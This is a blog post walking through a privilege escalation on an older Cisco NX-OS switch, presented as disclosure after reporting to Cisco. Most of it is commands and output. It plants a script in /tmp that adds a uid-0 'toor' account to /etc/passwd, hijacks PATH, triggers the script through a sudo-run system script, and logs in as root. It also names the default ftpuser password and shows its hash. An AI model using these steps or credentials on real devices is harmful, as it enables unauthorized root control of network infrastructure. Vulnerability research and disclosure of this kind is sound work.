Hacking NX-OS Part 1

Some of you may know me as a sage hacker from the mid 80’s to the early 90’s.  Although, if you met me after 1994, most of you probably don’t know that about me at all.  It was a previous life.  Sufficient time has passed since I have informed Cisco about numerous security vulnerabilities in older versions of NX-OS that I can now make this post.  I have no idea if these are even still relevant in newer versions.  I hack stuff, and I move on.  I was quite involved in NX-OS years ago as it was based on SanOS, which was an OS that I became intimately familiar with while getting my CCIE Storage.  Now of days I focus on advanced Software Engineering and doing anything on a beach!  You may wish to read my articles:

Deconstructing Cisco NX-OS Part 1: Exploding Kickstart
Deconstructing Cisco NX-OS Part 2: Exploding the System Image

 

A walk through hacking NX-OS:

We log in as normal.

login: admin
Password:
Last login: Fri Mar 25 07:25:34 UTC 2011 on ttyS0
Last login: Fri Mar 25 07:41:04 on ttyS0
Cisco NX-OS Software
Copyright (c) 2002-2010, Cisco Systems, Inc. All rights reserved.
switch#

You can see we can run bash, look at our environment, specifically our PWD and PATH:

switch# bash set
% Warning, couldn’t set default directory, Using ‘/’ instead
BASH=/bin/sh
BASH_ARGC=()
BASH_ARGV=()
BASH_EXECUTION_STRING=set
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]=”3″ [1]=”2″ [2]=”33″ [3]=”1″ [4]=”release” [5]=”i586-wrs-linux-gnu”)
BASH_VERSION=’3.2.33(1)-release’
CLIC_LEVEL=0
COLUMNS=80
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)’
HOSTTYPE=i586
IFS=’   ‘
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
POSIXLY_CORRECT=y
PPID=5305
PS4=’+ ‘
PWD=/
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SLOT_NUM=0
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=sh

We can view /etc/passwd, its your normal NX-OS /etc/passwd, root user locked out, etc.

switch# bash cat /etc/passwd
% Warning, couldn’t set default directory, Using ‘/’ instead root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
__eemuser:*:101:100:eemuser:/var/home/__eemuser:/isanboot/bin/nobash
adminbackup:x:0:0::/var/home/adminbackup:/bin/bash
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm

Lets create a script, we have write access to the filesystem, using the “nbv123” pass which is what is default for ftpuser 

switch# bash echo “#!/bin/bash” > /tmp/cat
% Warning, couldn’t set default directory, Using ‘/’ instead
switch# bash echo “echo toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash >> /etc/passwd” >> /tmp/cat
% Warning, couldn’t set default directory, Using ‘/’ instead
switch# bash cat /tmp/cat
% Warning, couldn’t set default directory, Using ‘/’ instead
#!/bin/bash
echo toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash >> /etc/passwd

Set the file to execute

switch# bash chmod 755 /tmp/cat
% Warning, couldn’t set default directory, Using ‘/’ instead
switch# bash ls -al /tmp/cat
% Warning, couldn’t set default directory, Using ‘/’ instead
-rwxr-xr-x 1 admin network-admin 76 Mar 25 07:29 /tmp/cat

Make sure we can manipulate PATH and put our CWD “.” as the first entry.  

The bash is spawned each instance of the command, so we have to set path in the same instance as the program we execute

switch# bash cd /tmp;PATH=.:$PATH;set
% Warning, couldn’t set default directory, Using ‘/’ instead
BASH=/bin/sh
BASH_ARGC=()
BASH_ARGV=()
BASH_EXECUTION_STRING=’cd /tmp;PATH=.:$PATH;set’
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]=”3″ [1]=”2″ [2]=”33″ [3]=”1″ [4]=”release” [5]=”i586-wrs-linux-gnu”)
BASH_VERSION=’3.2.33(1)-release’
CLIC_LEVEL=0
COLUMNS=80
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)’
HOSTTYPE=i586
IFS=’   ‘
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OLDPWD=/
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=.:/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
PIPESTATUS=([0]=”0″)
POSIXLY_CORRECT=y
PPID=5305
PS4=’+ ‘
PWD=/tmp
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=

Check our current id

switch# bash id
% Warning, couldn’t set default directory, Using ‘/’ instead
uid=2002(admin) gid=503(network-admin) groups=503(network-admin)

I can’t post this command as it would not be good, but you get the point

switch# bash cd /tmp;PATH=.:$PATH;set;sudo /isan/bin/perf-cmd.sh
% Warning, couldn’t set default directory, Using ‘/’ instead
BASH=/bin/sh
BASH_ARGC=()
BASH_EXECUTION_STRING=’cd /tmp;PATH=.:$PATH;set;sudo /isan/bin/perf-cmd.sh’
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]=”3″ [1]=”2″ [2]=”33″ [3]=”1″ [4]=”release” [5]=”i586-wrs-linux-gnu”)
BASH_VERSION=’3.2.33(1)-release’
CLIC_LEVEL=0
CURR_PRIV_LEVEL=-1
DIRSTACK=()
EUID=2002
GROUPS=()
HOME=/var/home/admin
HOSTNAME='(none)’
HOSTTYPE=i586
IFS=’   ‘
LD_PRELOAD=/isan/lib/libcli_sandbox.so
LINES=24
LOGNAME=admin
MACHTYPE=i586-wrs-linux-gnu
MAIL=/var/mail/admin
OLDPWD=/
OPTERR=1
OSTYPE=linux-gnu
PATH=.:/sbin:/usr/sbin:/isan/bin:/isanboot/bin:/usr/local/bin:/bin:/usr/bin
PIPESTATUS=([0]=”0″)
POSIXLY_CORRECT=y
PPID=5305
PWD=/tmp
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments:posix
SHLVL=1
SYSMGR_CARDSTATE=1
SYSMGR_RUNNING_CFG_DIR=/dev/shm
SYSMGR_SLOT_NUM=0
SYSMGR_SYNC_CFG_DIR=/mnt/pss
SYSMGR_SYSTEM_FILES_DIR=/
SYSMGR_VDC_ID=1
SYSMGR_VDC_SRV_TYPE=50
TERM=vt100
TMOUT=0
UID=2002
VSH_EXEC_VERBOSE=0
VSH_PWD=/bootflash
_=

Check /etc/passwd

switch# bash cat /etc/passwd
% Warning, couldn’t set default directory, Using ‘/’ instead
root:*:0:0:root:/root:/isanboot/bin/nobash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash
ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash
nobody:*:65534:65534:nobody:/home:/bin/sh
adminbackup:x:0:0::/var/home/adminbackup:/bin/bash
admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm
toor:UvdRSOzORvz9o:0:0:root:/root:/bin/bash

SUCCESS!

switch# exit
login: toor
Password:
Last login: Fri Mar 25 07:24:46 UTC 2011 on ttyS0
Last login: Fri Mar 25 07:32:34 on ttyS0
root@(none):/root> w
07:32:37 up  1:31,  1 user,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
toor     ttyS0    –                07:32    0.00s  0.00s  0.00s w
root@(none):/root> ls -al
total 12
drwxr-x—  2 root root 100 Mar 25 07:25 .
drwxr-xr-x 35 root root 780 Mar 25 06:01 ..
-rw——-  1 root root  15 Mar 25 07:25 .bash_history
-rw-r–r–  1 root root  15 Jan 13  2009 .bash_logout
-rw-r–r–  1 root root 191 Jan 13  2009 .profile
root@(none):/root> id
uid=0(root) gid=0(root) groups=0(root)
root@(none):/root> w
07:33:28 up  1:32,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
toor     ttyS0    –                07:32    0.00s  0.00s  0.00s w

This entry was posted in CCIE Routing and Switching, CCIE Storage, Cisco, Network Technology, Nexus, NX-OS and tagged , . Bookmark the permalink.

Leave a Reply